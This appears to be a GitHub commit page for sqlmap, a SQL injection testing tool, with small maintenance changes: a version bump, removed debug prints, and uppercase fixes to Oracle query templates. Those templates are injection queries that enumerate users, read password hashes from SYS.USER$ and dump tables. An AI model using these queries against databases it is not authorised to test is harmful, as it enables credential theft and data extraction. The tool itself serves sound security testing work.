Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 2f406b3

Browse files
bdamelebdamele
committed
Minor adjustments
1 parent c05f600 commit 2f406b3

4 files changed

Lines changed: 13 additions & 11 deletions

File tree

lib/core/agent.py

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -176,6 +176,9 @@ def nullAndCastField(self, field):
176176
@rtype: C{str}
177177
"""
178178

179+
if field.upper().endswith(", ROWNUM AS LIMIT"):
180+
return field
181+
179182
nulledCastedField = queries[kb.dbms].cast % field
180183
nulledCastedField = queries[kb.dbms].isnull % nulledCastedField
181184

@@ -450,6 +453,8 @@ def limitQuery(self, num, query, fieldsList=None):
450453
limitStr = queries[kb.dbms].limit % (num, 1)
451454
limitedQuery += " %s" % limitStr
452455

456+
# TODO: fix for Partial UNION query SQL injection technique both
457+
# Oracle and Microsoft SQL Server
453458
elif kb.dbms == "Oracle":
454459
limitedQuery = "%s FROM (%s, %s" % (untilFrom, untilFrom, limitStr)
455460
limitedQuery = limitedQuery % fromFrom

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -30,7 +30,7 @@
3030

3131

3232
# sqlmap version and site
33-
VERSION = "0.6.4-rc1"
33+
VERSION = "0.6.4-rc2"
3434
VERSION_STRING = "sqlmap/%s" % VERSION
3535
SITE = "http://sqlmap.sourceforge.net"
3636

lib/techniques/inband/union/test.py

Lines changed: 0 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -131,9 +131,6 @@ def unionTest():
131131
else:
132132
value, columns = __unionTestByNULLBruteforce(comment)
133133

134-
print value
135-
print columns
136-
137134
if columns:
138135
setUnion(comment, columns)
139136

xml/queries.xml

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -65,7 +65,7 @@
6565
<length query="LENGTH(%s)"/>
6666
<isnull query="NVL(%s, ' ')"/>
6767
<delimiter query="||"/>
68-
<limit query="ROWNUM AS limit %s) WHERE limit"/>
68+
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
6969
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
7070
<limitgroupstart/>
7171
<limitgroupstop/>
@@ -83,30 +83,30 @@
8383
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE='DBA')='DBA'"/>
8484
<users>
8585
<inband query="SELECT USERNAME FROM SYS.ALL_USERS"/>
86-
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS limit FROM SYS.ALL_USERS) WHERE limit=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
86+
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
8787
</users>
8888
<passwords>
8989
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
90-
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS limit FROM SYS.USER$ WHERE NAME='%s') WHERE limit=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
90+
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
9191
</passwords>
9292
<privileges>
9393
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" condition="GRANTEE"/>
94-
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS limit FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE limit=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'"/>
94+
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'"/>
9595
</privileges>
9696
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
9797
<dbs/>
9898
<tables>
9999
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
100100
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
101-
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS limit FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE limit=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
101+
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
102102
</tables>
103103
<columns>
104104
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
105-
<blind query="SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS limit FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s') WHERE limit=%d" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
105+
<blind query="SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s') WHERE LIMIT=%d" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
106106
</columns>
107107
<dump_table>
108108
<inband query="SELECT %s FROM %s"/>
109-
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS limit FROM %s) WHERE limit=%d" count="SELECT COUNT(*) FROM %s"/>
109+
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
110110
</dump_table>
111111
</dbms>
112112

0 commit comments

Comments
 (0)